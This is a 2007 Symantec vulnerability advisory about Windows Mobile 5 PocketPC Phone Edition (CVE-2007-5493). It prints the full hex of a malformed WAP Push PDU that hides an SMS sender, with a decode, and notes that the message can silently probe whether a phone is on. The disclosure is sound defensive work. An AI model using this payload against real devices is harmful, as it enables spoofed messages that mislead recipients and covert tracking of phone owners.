SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue Oct 17 2007 07:56PM
research symantec com
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

Symantec Vulnerability Research

http://www.symantec.com/research

Security Advisory

Advisory ID: SYMSA-2007-011

Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition

SMS Handler Issue With Regard to Malformed WAP Push

Messages Hiding Source

Author: Ollie Whitehouse / ollie_whitehouse (at) symantec (dot) com [email concealed]

Release Date: 17-10-2007

Application: Microsoft Windows Mobile 5 PocketPC

Platform: Windows

Severity: Information Disclosure

Vendor status: Vendor Reviewed

CVE Number: CVE-2007-5493

Reference: http://www.securityfocus.com/bid/26019

Overview:

Microsoft Windows Mobile 6 is the latest version of Microsoft's

mobile operating system. Designed for small embedded devices,

Windows Mobile is the CE feature set designed for PDA's and mobile

telephones. Microsoft Windows Mobile comes in three distinct

flavors, Pocket PC, Pocket PC Phone Edition and SmartPhone

A vulnerability has been discovered in the SMS handler on

Windows Mobile 2005 Pocket PC Phone edition which means the sender

of the original SMS message can be masked from the recipient when

sent a specifically crafted WAP PUSH message.

Details:

Symantec discovered that a slightly malformed WAP PUSH message

could be used to hide the originating sender of the message on

Windows Mobile 2005. The original PDU can be seen in [1]. The

following PDU will cause the Pocket PC Phone edition SMS handler

to incorrectly decode the PDU. The result of which is both the

sending telephone number and the sending time are incorrect.

[1] PDU (Line wrapped)

079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA

AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62

756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62

696C652E636F6D000101

The decode of the PDU can be seen in [2]. This decode was achieved

with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message

is received by a SmartPhone it will be silently discarded, which

can also be useful to an attacker who wishes to ascertain if a

cellphone is on without alerting the user through SMS delivery

receipts.

[2] Decode of PDU from PDUSpy

PDU LENGTH IS 118 BYTES

ADDRESS OF DELIVERING SMSC

NUMBER IS : +447785016005

TYPE OF NR. : International

NPI : ISDN/Telephone (E.164/163)

MESSAGE HEADER FLAGS

MESSAGE TYPE : SMS SUBMIT

REJECT DUPLICATES : NO

VALIDITY PERIOD : RELATIVE

REPLY PATH : NO

USER DATA HEADER : PRESENT

REQ. STATUS REPORT : NO

MSG REFERENCE NR. : 34 (0x22)

DESTINATION ADDRESS

NUMBER IS : +447716299660

TYPE OF NR. : International

NPI : ISDN/Telephone (E.164/163)

PROTOCOL IDENTIFIER (0x00)

MESSAGE ENTITIES : SME-to-SME

PROTOCOL USED : Implicit / SC-specific

DATA CODING SCHEME (0x04)

AUTO-DELETION : OFF

COMPRESSION : OFF

MESSAGE CLASS : NONE

ALPHABET USED : 8bit data

VALIDITY OF MESSAGE : 24.0 hrs

USER DATA PART OF SM

USER DATA LENGTH : 96 octets

UDH LENGTH : 6 octets

UDH : 05 04 0B 84 23 F0

UDH ELEMENTS : 05 - Appl. port addressing 16bit

4 (0x04) Bytes Information Element

09200 : SOURCE port is: allocated by IANA

02948 : DESTINATION port is: allocated by IANA

--- DATA ----------------------

05 04 0B 84 23 F0

USER DATA (TEXT) : %®ê¯?´?jEÆ

symantec?Symantec

bulkSMS (Unregistered Ver) -

LogixMobile.com

Vendor Response:

A vulnerability has been discovered in the SMS handler. If a

malicious message with no sender was received by a user on their

device, the user may be enticed in taking action or clicking the

URI that could lead to a second order attack.

Mitigating Factors: By default Windows mobile device policy require

SI messages to be authenticated. The Mobile Operators have the

ability to change the policy to not requiring authentication in

order for 3rd party ring tones and other SI messages.

Microsoft will look into a different architecture in future versions.

Recommendation:

Contact your mobile operator to ensure the proper policy is set on

your device.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned

the following names to these issues. These are candidates for

inclusion in the CVE list (http://cve.mitre.org), which standardizes

names for security problems.

CVE-2007-5493

- -------Symantec Vulnerability Research Advisory Information-------

For questions about this advisory, or to report an error:

research (at) symantec (dot) com [email concealed]

For details on Symantec's Vulnerability Reporting Policy:

http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive:

http://www.symantec.com/research/

Symantec Vulnerability Research GPG Key:

http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

- -------------Symantec Product Advisory Information-------------

To Report a Security Vulnerability in a Symantec Product:

secure (at) symantec (dot) com [email concealed]

For general information on Symantec's Product Vulnerability

reporting and response:

http://www.symantec.com/security/

Symantec Product Advisory Archive:

http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:

http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.a
sc

- ---------------------------------------------------------------

Copyright (c) 2007 by Symantec Corp.

Permission to redistribute this alert electronically is granted

as long as it is not edited in any way unless authorized by

Symantec Consulting Services. Reprinting the whole or part of

this alert in any medium other than electronically requires

permission from research (at) symantec (dot) com. [email concealed]

Disclaimer

The information in the advisory is believed to be accurate at the

time of publishing based on currently available information. Use

of the information constitutes acceptance for use in an AS IS

condition. There are no warranties with regard to this information.

Neither the author nor the publisher accepts any liability for any

direct, indirect, or consequential loss or damage arising from use

of, or reliance on, this information.

Symantec, Symantec products, and Symantec Consulting Services are

registered trademarks of Symantec Corp. and/or affiliated companies

in the United States and other countries. All other registered and

unregistered trademarks represented in this document are the sole

property of their respective companies/owners.

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.7 (MingW32)

iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD

1qhcVHQ07YHEdgF0zUP81/k=

=pFeF

-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus